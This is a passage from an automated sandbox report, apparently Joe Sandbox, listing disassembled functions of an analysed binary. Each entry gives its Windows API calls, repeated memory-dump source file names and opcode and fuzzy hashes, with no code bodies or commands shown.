                                                                                                                                                          • Part of subcall function 00A94010: _memmove.LIBCMT ref: 00A9405A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$Free$Load_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3640140200-0
                                                                                                                                                        • Opcode ID: 932babf0f58c23aa1636d5a5705c8c33ff37cde8e6cac84263763c87f78708b3
                                                                                                                                                        • Instruction ID: 7827fca21c611906f8d43ef7f081d2dfbe47a036ef830d5493e319971b46eaab
                                                                                                                                                        • Opcode Fuzzy Hash: 932babf0f58c23aa1636d5a5705c8c33ff37cde8e6cac84263763c87f78708b3
                                                                                                                                                        • Instruction Fuzzy Hash: F5119132710219AACF20AB64DE06FAE77F99F54704F208829F942A61C1DF749E459B50
                                                                                                                                                        Function 00B0AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                        • Opcode ID: 82a9f31c39c4f45abc03a4c1d4920d2632815d09bcbb77e99e6a3180ebce29ed
                                                                                                                                                        • Instruction ID: bc95afb520d27b1d874714be33daad3476f04f29cf5f31670628d28ffcd33c02
                                                                                                                                                        • Opcode Fuzzy Hash: 82a9f31c39c4f45abc03a4c1d4920d2632815d09bcbb77e99e6a3180ebce29ed
                                                                                                                                                        • Instruction Fuzzy Hash: 0D2124705086018FEB24DF68D544E1BBBE1BF8A344F154AACE996472A2C731E885CF52
                                                                                                                                                        Function 00AF10E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                        • Opcode ID: 79befd4ebd60ea7acea6bd980325ea8e8944598974a27ef9456f4f069c98b62f
                                                                                                                                                        • Instruction ID: 9512d733b7f6a944bb37a4748cc597c874f1af254f6bd4aeefe1b4d68ba62cda
                                                                                                                                                        • Opcode Fuzzy Hash: 79befd4ebd60ea7acea6bd980325ea8e8944598974a27ef9456f4f069c98b62f
                                                                                                                                                        • Instruction Fuzzy Hash: 34115136701219DFDB14DF59C480AEA77E9FF49760B05826AFE458F351CB30AD408B95
                                                                                                                                                        Function 00A94CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00A94E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00A94CF7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                        • Opcode ID: 1df9c2081b3dd4713b3bdcb4f95f8d18a0259b1d3646d18852d60d3406e49e59
                                                                                                                                                        • Instruction ID: 36450767b6736ddfe96e94a9730999a2dbbc27ff4d6975fe3a6418cf081c7d6d
                                                                                                                                                        • Opcode Fuzzy Hash: 1df9c2081b3dd4713b3bdcb4f95f8d18a0259b1d3646d18852d60d3406e49e59
                                                                                                                                                        • Instruction Fuzzy Hash: 6C112735205B459FDB20CF16C880F66B7F9AF48754F10C51EE5AA86A50C7B1E856CB60
                                                                                                                                                        Function 00A94D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                                                        • Instruction ID: 8eda7f00845c6fe2b0ef54cb74ce17731104df499c18811a662eb17705a58cda
                                                                                                                                                        • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                                                        • Instruction Fuzzy Hash: 710171B9301501AFD7059B2CC951D35F7A9FF993507148159E519C7742DB30AC22C7E0
                                                                                                                                                        Function 00A9CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                                                        • Instruction ID: 17d11132126ccda550fc9d71aea21425e221c6f7cdd495fdea4bd2fd37790e21
                                                                                                                                                        • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                                                        • Instruction Fuzzy Hash: 34018672210B016ED7149B79D807A66BBE8DF487A0F50852AF95ACB1D1EB71E4008A90
                                                                                                                                                        Function 00AAF2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                                        • Instruction ID: 0d5c39b746d55af5358733418df91fb2da73aec43fb47cbd0eddba9a07224254
                                                                                                                                                        • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                                        • Instruction Fuzzy Hash: 9301DB71104601EFCF286FA8D941E5BBBE8DF83360B10463EF8684B291D731985587B1
                                                                                                                                                        Function 00AE95AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 00AE95C9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Startup
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 724789610-0
                                                                                                                                                        • Opcode ID: 17ed20bd6fc57a7d0d68e7a7b69c7a6bd3953fda7bc7bf150382354010e3fcd1
                                                                                                                                                        • Instruction ID: fffa3baccfdcf8242e587fbc504d3736e0cf72e5913ca2ffd272d8cdc2ed9428
                                                                                                                                                        • Opcode Fuzzy Hash: 17ed20bd6fc57a7d0d68e7a7b69c7a6bd3953fda7bc7bf150382354010e3fcd1
                                                                                                                                                        • Instruction Fuzzy Hash: 56E0E5372042146BC310EA64DC05AABB799BF85720F04875ABDA48B2C1DB30DC14C3D1
                                                                                                                                                        Function 00A93E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00A934E2,?,00000001), ref: 00A93E6D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                        • Opcode ID: 317f0495359e2f3a57cd8acd86e54ecb63b433f92cc574cdf1862ab8c0d4ea60
                                                                                                                                                        • Instruction ID: f12de245d0a0802fb4a7aca484d0f00151287e70aabe3d12761edf68d8c02baf
                                                                                                                                                        • Opcode Fuzzy Hash: 317f0495359e2f3a57cd8acd86e54ecb63b433f92cc574cdf1862ab8c0d4ea60
                                                                                                                                                        • Instruction Fuzzy Hash: 91F015B6606751DFCF349F64D494852BBF6AF047193248A2EE1D682622C7319944DF00
                                                                                                                                                        Function 00AD79F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00AD7A11
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FolderPath_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3334745507-0
                                                                                                                                                        • Opcode ID: 29f8ef062d8dcb037bf6ab03b9494cd375c8bae27f178e4530e0f803acba600e
                                                                                                                                                        • Instruction ID: 320e17524070e32dc9649dd7747d4327aab8184737ce2ec4c1c372ddf2644312
                                                                                                                                                        • Opcode Fuzzy Hash: 29f8ef062d8dcb037bf6ab03b9494cd375c8bae27f178e4530e0f803acba600e
                                                                                                                                                        • Instruction Fuzzy Hash: 59D05EA66002282FDF50E6649C09DFB36ADC744104F0042A0786DD2142E920AE4586F0
                                                                                                                                                        Function 00AD6852 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AD6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00AD685E,?,?,?,00B04A5C,00B2E448,00000003,?,?), ref: 00AD66E2
                                                                                                                                                        • WriteFile.KERNEL32(?,?,00B522E8,00000000,00000000,?,?,?,00B04A5C,00B2E448,00000003,?,?,00A94C44,?,?), ref: 00AD686C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$PointerWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 539440098-0
                                                                                                                                                        • Opcode ID: 96edd8a748bff775ebe28c09e7844ebd11243efa4b4fac56a63e46568a8a523b
                                                                                                                                                        • Instruction ID: 1fb2c6dbf05a1460126be7c8d602f69467a60ad6b2397d0e425edfe49bb3e054
                                                                                                                                                        • Opcode Fuzzy Hash: 96edd8a748bff775ebe28c09e7844ebd11243efa4b4fac56a63e46568a8a523b
                                                                                                                                                        • Instruction Fuzzy Hash: 8DE04636000218BBDB20AF94D805ACABBB8FB08350F00451AF941A6110D7B1EA149BA0
                                                                                                                                                        Function 00A9193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A91952
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSendTimeout
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1599653421-0
                                                                                                                                                        • Opcode ID: 2f3a729ee6d27b3a0f26857d67851db4091871f003d29e329b02c3a59f5cba51
                                                                                                                                                        • Instruction ID: 474b76747586b1f101faecffc5bf5accf0f8def0181fd2343f08ecb20d703902
                                                                                                                                                        • Opcode Fuzzy Hash: 2f3a729ee6d27b3a0f26857d67851db4091871f003d29e329b02c3a59f5cba51
